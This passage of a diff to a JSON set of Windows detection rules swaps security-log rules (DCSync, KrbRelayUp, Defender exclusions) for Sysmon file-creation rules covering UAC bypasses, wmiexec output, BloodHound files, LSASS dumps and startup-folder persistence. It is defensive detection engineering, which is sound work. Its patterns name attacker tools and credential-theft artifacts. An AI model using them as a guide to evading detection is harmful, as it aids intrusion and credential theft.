ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_mal_wceaux_dll.yml" + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" }, { - "title": "HybridConnectionManager Service Installation", - "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service installation.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Executable File Creation", + "id": "74babdd6-a758-4549-9632-26535279e654", + "status": "experimental", + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\')))" ], - "filename": "win_security_hybridconnectionmgr_svc_installation.yml" + "filename": "file_event_win_susp_executable_creation.yml" }, { - "title": "Possible Shadow Credentials Added", - "id": "f598ea0c-c25a-4f72-a219-50c44411c791", - "status": "experimental", - "description": "Detects possible addition of shadow credentials to an active directory object.", - "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "title": "UAC Bypass Using MSConfig Token Modification - File", + "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_possible_shadow_credentials_added.yml" + "filename": "file_event_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Password Change on Directory Service Restore Mode (DSRM) Account", - "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "status": "stable", - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", - "author": "Thomas Patzke", + "title": "Wmiexec Default Output File", + "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", + "status": "experimental", + "description": "Detects the creation of the default output filename used by the wmiexec tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.lateral_movement", + "attack.t1047" ], "falsepositives": [ - "Initial installation of a domain controller" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$'))" ], - "filename": "win_security_susp_dsrm_password_change.yml" + "filename": "file_event_win_wmiexec_default_filename.yml" }, { - "title": "Login with WMI", - "id": "5af54681-df95-4c26-854f-2565e13cfab0", - "status": "stable", - "description": "Detection of logins performed with WMI", - "author": "Thomas Patzke", + "title": "New Shim Database Created in the Default Directory", + "id": "ee63c85c-6d51-4d12-ad09-04e25877a947", + "status": "test", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Monitoring tools", - "Legitimate system administration" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND ProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.sdb' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\apppatch\\\\Custom\\\\%' ESCAPE '\\')" ], - "filename": "win_security_susp_wmi_login.yml" + "filename": "file_event_win_creation_new_shim_database.yml" }, { - "title": "Sysmon Channel Reference Deletion", - "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", - "status": "test", - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Creation with Colorcpl", + "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "status": "experimental", + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1564" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" ], - "filename": "win_security_sysmon_channel_reference_deletion.yml" + "filename": "file_event_win_susp_colorcpl.yml" }, { - "title": "Operation Wocao Activity - Security", - "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", - "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "title": "BloodHound Collection Files", + "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", + "status": "experimental", + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "author": "C.J. May", "tags": [ "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", "attack.execution", - "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Some false positives may arise in some environment and this may require some tuning. Add addional filters or reduce level depending on the level of noise" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" ], - "filename": "win_security_apt_wocao.yml" + "filename": "file_event_win_bloodhound_collection.yml" }, { - "title": "Suspicious Scheduled Task Update", - "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "title": "CVE-2022-24527 Microsoft Connected Cache LPE", + "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", "status": "experimental", - "description": "Detects update to a scheduled task event that contain suspicious keywords.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.t1059.001", + "cve.2022.24527" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_susp_scheduled_task_update.yml" + "filename": "file_event_win_cve_2022_24527_lpe.yml" }, { - "title": "KrbRelayUp Attack Pattern", - "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "title": "UAC Bypass Using EventVwr", + "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_krbrelayup.yml" + "filename": "file_event_win_uac_bypass_eventvwr.yml" }, { - "title": "RottenPotato Like Attack Pattern", - "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", - "status": "test", - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "author": "@SBousseaden, Florian Roth", - "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1557.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" - ], - "filename": "win_security_susp_rottenpotato.yml" - }, - { - "title": "Windows Defender Exclusion Set", - "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "title": "ScreenConnect Temporary Installation Artefact", + "id": "fec96f39-988b-4586-b746-b93d59fd1922", "status": "test", - "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", - "author": "@BarryShooshooga", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Intended inclusions by administrator" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Bin\\\\ScreenConnect.%' ESCAPE '\\')" ], - "filename": "win_security_defender_bypass.yml" + "filename": "file_event_win_screenconnect_artefact.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - Security", - "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "title": "Writing Local Admin Share", + "id": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1546.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\\\\\127.0.0%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_clip_services_security.yml" + "filename": "file_event_win_writing_local_admin_share.yml" }, { - "title": "Mimikatz DC Sync", - "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "title": "WScript or CScript Dropper - File", + "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", "status": "experimental", - "description": "Detects Mimikatz DC sync security events", - "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", - "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" - ], + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "author": "Tim Shelton", "falsepositives": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_dcsync.yml" + "filename": "file_event_win_cscript_wscript_dropper.yml" }, { - "title": "Weak Encryption Enabled and Kerberoast", - "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "status": "test", - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "author": "@neu5ron", + "title": "UEFI Persistence Via Wpbbin - FileCreation", + "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", + "status": "experimental", + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1542.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "win_security_alert_enable_weak_encryption.yml" + "filename": "file_event_win_wpbbin_persistence.yml" }, { - "title": "Denied Access To Remote Desktop", - "id": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", + "title": "Startup Folder File Write", + "id": "2aa0a6b4-a865-495b-ab51-c28249537b75", "status": "test", - "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", - "author": "Pushkarev Dmitry", + "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.lateral_movement", - "attack.t1021.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Valid user was not added to RDP group" + "FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4825')" - ], - "filename": "win_security_not_allowed_rdp_access.yml" - }, - { - "title": "CVE-2023-23397 Exploitation Attempt", - "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", - "status": "experimental", - "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", - "author": "Robert Lee @quantum_cookie", - "tags": [ - "attack.credential_access", - "attack.initial_access", - "cve.2023.23397" - ], - "falsepositives": [ - "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp%' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" + "filename": "file_event_win_startup_folder_file_write.yml" }, { - "title": "DPAPI Domain Master Key Backup Attempt", - "id": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", + "title": "Suspicious Desktopimgdownldr Target File", + "id": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", "status": "test", - "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.defense_evasion", + "attack.t1105" ], "falsepositives": [ - "If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event." + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4692')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Personalization\\\\LockScreenImage\\\\%' ESCAPE '\\') AND NOT (TargetFilename LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%.jpg%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg%' ESCAPE '\\' OR TargetFilename LIKE '%.png%' ESCAPE '\\')))" ], - "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml" + "filename": "file_event_win_susp_desktopimgdownldr_file.yml" }, { - "title": "Active Directory User Backdoors", - "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "status": "test", - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "author": "@neu5ron", + "title": "WerFault LSASS Process Memory Dump", + "id": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "status": "experimental", + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1098", - "attack.persistence" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 